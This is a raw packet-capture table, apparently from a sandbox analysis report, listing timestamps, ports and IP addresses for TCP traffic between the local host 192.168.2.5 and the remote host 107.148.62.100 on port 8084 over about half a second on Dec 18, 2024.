Dec 18, 2024 13:31:57.035362959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.035928011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.035981894 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.036081076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.036660910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.036722898 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.036822081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.036869049 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.037560940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.037684917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.037736893 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.038405895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.038419008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.038464069 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.039196014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.039371967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.039419889 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.039844990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.039936066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.040497065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.040546894 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.040633917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.041263103 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.041306973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.041321039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.041354895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.041950941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.042054892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.042109013 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.042670012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.042800903 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.042855024 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.043473959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.043591022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.044329882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.044373035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.044400930 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.044445038 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.044939995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.045042038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.045094013 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.045746088 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.045850992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.045906067 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.046480894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.046766043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.047257900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.047318935 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.047425985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.048079967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.048118114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.048131943 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.048163891 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.048698902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.048917055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.048969984 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.049462080 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.049587011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.049638033 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.050246000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.050399065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.050657988 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.051048040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.051132917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.051831961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.051887035 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.052102089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.052148104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.052197933 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.052956104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.053004980 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.053056955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.053107023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.053159952 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.054606915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.054745913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.054814100 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.054979086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.059875011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.059889078 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.059943914 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.060164928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.062012911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.062082052 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.062212944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.062278032 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.062340021 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.069502115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.069514990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.069571018 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.069864035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.071858883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.071918011 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.072009087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.072057009 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.072191954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.074276924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.074336052 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.074439049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.074626923 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.075412989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.075479984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.075484037 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.076199055 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.076908112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.077037096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.077125072 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.079200983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.079361916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.079557896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.079608917 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.080739975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.080810070 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.080858946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.081028938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.081068993 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.081073046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.083981991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.084043980 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.084182024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.084343910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.084399939 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.086549044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.086658955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.086899042 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.086950064 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.090841055 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.090976954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.091033936 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.091209888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.091255903 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.093360901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.093462944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.093533039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.093880892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.098927975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.098973036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.098982096 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.099267006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.099333048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.099904060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.100011110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.100059032 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.100202084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.103290081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.103346109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.103358030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.103652000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.103724003 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.104509115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.104645014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.104804993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.104872942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.108105898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.108195066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.108232975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.108427048 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.108479977 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.209158897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.209395885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.209474087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.209481001 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.211292982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.211306095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.211349964 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.211647987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.211695910 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.216152906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.216310978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.216368914 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.216409922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.217595100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.217645884 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.217762947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.217969894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.218027115 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.225419044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.225531101 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.225584030 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.225749016 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.225893021 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.225946903 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.226007938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.226648092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.228214979 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.228454113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.228796005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.228965998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.229008913 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.232358932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.232561111 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.232595921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.233172894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.233232021 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.236869097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.236941099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.237004995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.237123013 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.240592957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.240650892 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.240731001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.240930080 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.240988016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.241389990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.241405010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.241455078 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.242774010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.242868900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.242922068 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.243190050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.247499943 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.247554064 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.247734070 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.248413086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.250819921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.250884056 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.251082897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.251101017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.251143932 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.470467091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.470514059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.470613956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.470786095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.470832109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.470887899 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.471381903 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.471554995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.472090960 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.472141027 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.472172022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.472908020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.472958088 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.473014116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.473061085 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.473593950 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.473710060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.473757029 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.474390984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.474402905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.474441051 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.475097895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.475225925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.475856066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.475899935 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.475961924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.476187944 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.476761103 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.476772070 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.476815939 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.477475882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.477487087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.477531910 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.478183031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.478238106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.478971004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.479022026 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.479124069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.479638100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.479686975 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.479844093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.479890108 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.480426073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.480528116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.480576992 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.481515884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.481679916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.481748104 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.482433081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.482579947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.483323097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.483370066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.483397007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.483972073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.484019041 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.484047890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.484092951 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.484721899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.484733105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.484781027 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.485305071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.485476017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.485524893 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.486212015 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.486314058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.486358881 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.487036943 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.487258911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.487858057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.487901926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.488007069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.488184929 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.488535881 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.488547087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.488584995 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.489264011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.489337921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.489378929 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.489833117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.489850044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.489891052 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.490551949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.490672112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.491096973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.491134882 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.491218090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.491830111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.491888046 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.491918087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.491961956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.492445946 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.492511988 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.492551088 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.493360043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.493370056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.493407965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.494005919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.494184971 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.494798899 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.494842052 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.494891882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.495558023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.495600939 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.495630980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.495676994 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.496207952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.496463060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.496510983 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.497056961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.497195959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.497236013 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.497833014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.497981071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.498579979 CET	8084	49705	107.148.62.100	192.168.2.5
